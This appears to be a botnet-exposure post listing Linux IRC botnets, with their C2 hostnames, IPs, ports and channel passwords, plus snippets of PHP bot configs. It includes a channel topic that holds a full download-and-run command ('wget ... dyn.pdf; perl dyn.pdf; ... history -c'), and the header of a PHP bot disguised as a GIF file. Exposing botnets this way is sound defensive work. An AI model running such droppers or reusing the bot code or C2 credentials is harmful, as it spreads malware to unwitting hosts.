Linux bots

comment.dyn.mk (Linux IRC Bots Hosted In Korea, Republic Of Seoul Sk Broadband Co Ltd)

Resolved : [ comment.dyn.mk ] To [ 1.234.46.241 ] maybe hacked machine.
$server = 'comment.dyn.mk' unless $server;
my $port = '6667';
[11:00] * Now talking in #kill (around 100 bots inside)
[11:00] * Topic is 'wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c '
[11:00] * Set by anonplus on Thu Jan 07 17:06:34 U

Linux Botnet Hosted In blackunix.us

This is the bot used to scan for vulnerabilities: hxxp://pastebin.com/dEMULiQV
Now talking in #botnets
Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ]
Topic By : [ uyap ]
Modes On : [ #botnets ] [ +smntrMuk fcuked ]
The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log

ircd.freenetwork.com.ar (Linux botnet hosted in Korea, Republic Of Seoul Korea Internet Data Center)

Botnet found by X.
ircd.freenetwork.com.ar
nick:
addr: ircd.freenetwork.com.ar
ip: 222.231.10.81
Longip: 3739683409
Server: ircd.freenetwork.com.ar:6667
Channels: #org,#rpl,#root,#viar
Now 15 talking in #org
Topic On : [ #org ] [ Don’t flood fuck || Register your nick… !!! [ SCAN ON ] || if you want to donate server,,please pm admin.. ]
Hosting infos: http://whois.domaintools.com/222.231.10.81

bot.blackunix.us (Linux bots hosted in France Roubaix Ovh Systems)

Found by Yewnix.
Resolved : [bot.blackunix.us] To [94.23.89.246]
Resolved : [bot.blackunix.us] To [217.29.115.1]
Resolved : [bot.blackunix.us] To [91.151.85.31]
Resolved : [bot.blackunix.us] To [59.167.240.231]
Resolved : [bot.blackunix.us] To [58.180.42.200]
Resolved : [bot.blackunix.us] To [64.31.27.18]
class pBot {
 var $config = array("server"=>"bot.blackunix.us",
 "port"=>"20",
 "pass"=>"",
 "prefix"=>"Blood",
 "maxrand"=>"15",
 "key"=>"none",
 "chan"=>"#metri",
 "modes"=>"+ps",
 "chan2"=>"#metri",
 "password"=>"crack",
 "trigger"=>".",
 "hostauth"=>"bogel.us" // * for any hostname (remember: /setvhost pasukan.ddos.reload-x.us)
Hosting

203.81.204.105 (14k Linux bots hosted in Pakistan Karachi South Cmbroadband Noc)

Big heckers big net. Thnx to loadx and Yewnix for the ownage and exposing them. Everything is inside the config file:
/* Type of comments */
#Comment type 1 (Shell type)
// Comment type 2(C++ style)
/* Comment type 3 (C Style) */
#those lines are ignored by the ircd.
loadmodule "src/modules/commands.so";
#loadmodule "cloak.dll";
#include

37.221.160.132 (Kaiten IRC botnet hosted by voxility.net)

Server: 37.221.160.132
Port: 443
Channel: #yodawg
Channel password: lol.WH
#yodawg 58 [+smnu] yo dawg i herd u like backdoors so we put a backdoor in ur backdoor so u can get owned while u own
Check his server usage here: hxxp://fkn.ddos.cat/p.php
Another one from x00 http://pastebin.com/fgjJGFxt
Hosting infos: http://whois.domaintools.com/37.221.160.132

208.89.209.54 (IRC botnet hosted by virpus.com)

Server: 208.89.209.54
Port: 6667
Current global users 77, max 695
Channels:
#goon 3
#aryan 39 #OFFLINE
#flood 1
##yBz## 15
##Offline## 19
Aryan bots:
Channel: #aryan
Topic for #aryan is: #OFFLINE
Topic for #aryan set by formality at Sun May 05 16:23:03 2013
Linux bots:
Channel: ##Offline##
Channel: ##yBz##
Hosting infos: http://whois.domaintools.com/208.89.209.54

irc.benjol.tk (Linux bots hosted in France Roubaix Ovh Systems)

Resolved : [irc.benjol.tk] To [37.59.42.103]
Resolved : [irc.benjol.tk] To [46.45.183.189]
GIF89a [binary GIF header bytes] <?
/*
 *
 * NOGROD. since 2008
 * IRC.UDPLINK.NET
 *
 * COMMANDS:
 *
 * .user <password> //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail <to>